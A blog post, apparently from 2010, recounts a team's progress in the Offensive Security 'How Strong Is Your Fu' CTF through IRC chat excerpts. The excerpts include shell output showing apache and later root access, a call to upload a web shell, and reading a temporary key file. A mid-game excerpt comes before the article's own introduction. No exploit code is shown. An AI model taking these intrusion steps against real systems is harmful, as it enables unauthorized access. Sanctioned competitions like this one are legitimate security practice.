[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin
[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)
[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin
[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)
[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin
[16:52] <@mr_me> NICE
[16:52] <@mr_me> dude
[16:52] <@mr_me> UPLOAD A WEB SHELL
[16:53] <@Sud0> yes will do it ;)

After trying to upload a web shell without success, we decided to try another approach (going directly for the n00bSecret.txt):

[17:32] <@Sud0> mr_me wake up :)
[17:32] <@mr_me> 1 sec
[17:32] <@Sud0> héhé
[17:32] <@corelanc0d3r> can anyone run a find command on the server, to find out where the n00bSecret.txt file is located ?
[17:32] <@mr_me> not fast as u
[17:33] <@corelanc0d3r> they reverted
[17:33] <@Sud0> fine :)
[17:33] <@Sud0> will find it
[17:33] <@Sud0> one sec
[17:34] <@Sud0> /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt
[17:34] <@mr_me> how did u get that
[17:34] <@corelanc0d3r> with find command ?
[17:34] <@corelanc0d3r> so can you cat the file ?
[17:34] <@Sud0> cat ->
[17:34] <@Sud0> 4e4a430da8f32cfa4e41a3e7999bee6b11e8f925154d4adedd0749790d0644aaebff21dc18451ad0e2d3d06b639315b41478c23663f743bf8e66fa2661a3f21c
[17:34] <@mr_me> yeh now cat
[17:34] <@Sud0> :D
[17:34] <@mr_me> NICE
[17:34] <@corelanc0d3r> that's the cat ?
[17:34] <@TecR0c> yayyyyyyyyyyy

As the key's lifetime was about 10 minutes, the first one to reach stage 2 was Mr TecR0c:

[17:38] <@TecR0c> 25 points !
[17:39] <@TecR0c> stage 2 !
[17:39] <@corelanc0d3r> guys
[17:39] <@corelanc0d3r> can you please post your findings on dradis
[17:39] <@Sud0> wait
[17:39] <@Sud0> wait
[17:39] <@Sud0> the file n00b
[17:39] <@Sud0> is no longer there
[17:40] <@corelanc0d3r> file changes every few minutes ?
[17:40] <@mr_me> it must
[17:40] <@TecR0c> shit
[17:40] <@mr_me> doesnt work for me
[17:40] <@mr_me> Sud0:
[17:40] <@mr_me> can u cat it for everyone
[17:40] <@mr_me> plz
[17:40] <@mr_me> we have slow requests here
[17:41] <@TecR0c> shit didn't know it can only be used once
[17:41] <@TecR0c> sorry sud0
[17:41] <@Sud0> :'(

Next chapter: getting the killthen00b machine

Offsec CTF : How Strong Is Your Fu (HSIYF)

Here we are, my first article on my first blog.
The article is not really about how we got 75 points in the Offsec CTF, but about how it was, and to share the moments that we spent together.

Generally it started like this (08/05/2010):

[15:51] <@markot> :D
[15:52] <@chap0> "howstrongisyourfu"
[15:52] <@chap0> as password????
[15:52] <@chap0> no one got an email???
[15:52] <@markot> i tried "password"
[15:52] <@markot> :D
[15:53] <@chap0> no really "howstrongisyourfu" is the password that was sent to me
[15:53] <@TecR0c> ok
[15:53] <@TecR0c> back
[15:55] <@markot> works!!


It ended like this (10/05/2010):

[11:21] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:21] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:21] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@_sinn3r> whoat
[11:22] <@TecR0c> omg
[11:22] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@_sinn3r> which file?
[11:22] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@TecR0c> give me KEY:)
[11:22] <@mr_me> wow
[11:22] <@TecR0c> go Sud0 !!!!!!!!!!!!!!
[11:22] <@mr_me> wtf go go

OK, let's share the best moments between those two parts, and as you will see, all did a great job; everyone played their part.